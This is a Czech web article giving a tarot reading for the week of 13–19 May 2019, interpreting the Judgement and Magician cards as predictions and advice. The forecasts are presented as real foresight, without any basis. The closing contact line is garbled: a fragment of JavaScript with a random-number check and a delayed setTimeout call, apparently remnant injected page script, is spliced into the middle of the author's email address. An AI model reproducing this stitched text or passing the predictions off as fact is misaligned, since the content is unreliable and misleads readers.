Ezoterika, Magie,  Tarot

Týdenní čtení z tarotových karet: 13.-19. května 2019

Výklad na nastávající nebo aktuální týden pro vás může být velice důležitý, protože díky němu se můžete připravit na to, co vám přinese, upozorní, čemu se vyhnout, ukáže, na co se těšit a předestře vám týdenní výzvy. Výklad pro vás připravila Judita Peschlová…

První karta týdne: Poslední soud

Pokud jste doteď něčím trpěli, něco nepříjemného, neřkuli bolestného snášeli, karta Poslední soud říká, že konec vašeho trápení je nadohled. Těžké břímě z vás spadne, nebo vás od něj někdo laskavý, současně však přísný osvobodí. Čekají vás pak „z rozhodnutí vyšších sil“ nové a netušené možnosti v mnoha oblastech života, rovněž metamorfóza té, kterou prochází housenka, když se mění na motýla. Končí doba strnulosti, stagnace, zaseknutí se v nedokončené fázi nějakého životního procesu. Poslední soud věští „vítězství dobra“, osvobození od všeho, co vás tíží. Najdete „to pravé“ řešení, které jste již delší dobu hledali. Cosi hodnotného vstoupí do vašeho života. Budete-li konat na základě zdravého a dobrého úsudku, může se stát malý, nebo i větší zázrak!

Výzva Posledního soudu na tento týden:

Podívejte se na svou momentální životní situaci a položte si otázku, jaké příležitosti máte v této době k dispozici, abyste se mohli změnit a tak změnit i svůj osud. Možná jste již vložili spoustu energie a času do „zlepšování“ sebe sama i svého života, bude vám však „shůry“ nabídnuta možnost projít důležitou transformací, která vyústí ve skutečně velké věci. Nakonec to může být jen malý posun, přesto však povedou i ty nejmenší změny k největší „obnově“. Vše, co musíte udělat, je rozpoznat toto „volání“ a jednat podle něj. Tím, že ho budete následovat, otevřete zcela novou kapitolu svého života.

Druhá karta týdne: Mág

Karta Mág je pozitivním znamením, že tento týden budete mít velkou šanci na realizaci svého zatím nevyužitého potenciálu. Budete moci uvést do pohybu vše, co se vám jen bude chtít. Pokud si děláte plány nebo existuje něco, co potřebujete učinit, měli byste být připraveni okamžitě konat. Je prostě čas na ráznou akci. Budete-li jednat rozhodně a bez zaváhání, bude Vesmír na vaší straně a bohatě vás odmění. Stanou se věci, které jste možná nepovažovali za možné. Poselstvím karty Mág je, že jestli přesně víte, co děláte a jste ochotni dát do toho vší svou energii a čas, můžete dosáhnout neuvěřitelných věcí.

Výzva Mága na tento týden:

Ukažte konečně světu své výtečné vlastnosti, svou šikovnost a mistrovství. Umožněte druhým, aby mohli obdivovat vaši dovednost, kterou jste dosud skrývali, nebo neměli odvahu či sílu uplatnit. Naučte se čerpat energii ze všech přístupných „zdrojů“, z přírody, ze čtyř živlů, z nebes, z boží síly apod. Učte se, studujte, získávejte nové zkušenosti, budou se vám hodit později.

Judita Katona Peschlová

www.angelcity.cz, judita.andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andele@gmail.com